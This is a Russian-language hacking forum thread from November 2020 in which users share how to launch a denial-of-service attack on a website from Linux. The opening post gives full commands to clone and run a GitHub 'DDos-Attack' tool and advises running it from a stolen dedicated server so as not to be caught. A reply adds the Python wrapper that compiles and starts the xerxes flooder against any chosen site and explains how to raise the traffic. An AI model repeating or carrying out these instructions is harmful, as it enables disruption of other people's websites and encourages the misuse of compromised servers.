![]() |
Шаломы пиплы и не...Вчера я опубликовал слабую DOS атаку(не путать с DDOS атакой)через какой-то термукс но сегодня через Linux. Это лучше делать с пизженного дедика или левого сервака, а то очень быстро придут бить лицо
Приступим чего же ждем: Установка обновим пакеты: sudo apt update && sudo apt upgrade Дальше качаем гит и питон: sudo apt install git python Копируем нужный нам репозиторий: git clone https://github.com/ProgrammerGaurav/DDos-Attack.git Открываем папку с тулзой и делаем все файлы в ней исполняемыми: cd DDos-Attack chmod +x * Собственно запускаем тулзу: python run.py После этого нам нужно просто ввести название сайта: Данная утилита направляет 80 ботов/сек, поэтому для лучшего результата, запустите её хотя бы в 5 окнах. Но если полазить в коде можно изменить, но жаль что я этого не знаю как это делать:( Да может и нужно встать с кровати и напечатать готовый текст, но это лучше чем платить за DDOS атаку с голой жопой... Спасибо за прочтение! |
указал бы, что это лучше делать с пизженного дедика или левого сервака, а то очень быстро придут бить лицо
|
Код этот из питона идет в Си
import os os.system("clear") print(""" ddos""") os.system("chmod +x xerxes.c") os.system("gcc xerxes.c -o xerxes") a = input("\n Enter website address eg : www.fakesite.com \n Website Name : ") os.system("./xerxes "+a+" 80") в конце можно поставить сколько хочешь ботов вместо 80 и не надо открывать доп окна |
Ну, если на сайте будет мало-мальски нормальная защита это тебе не поможет, а если голой жопой наружу, то почему бы и не сэкономить
|
Цитата:
|
Цитата:
Сообщение обновлено: 25 Ноя 2020 Ахуеть ты ахуенныйramp Цитата:
Цитата:
Сообщение обновлено: 25 Ноя 2020 Исправил |
| Время: 18:57 |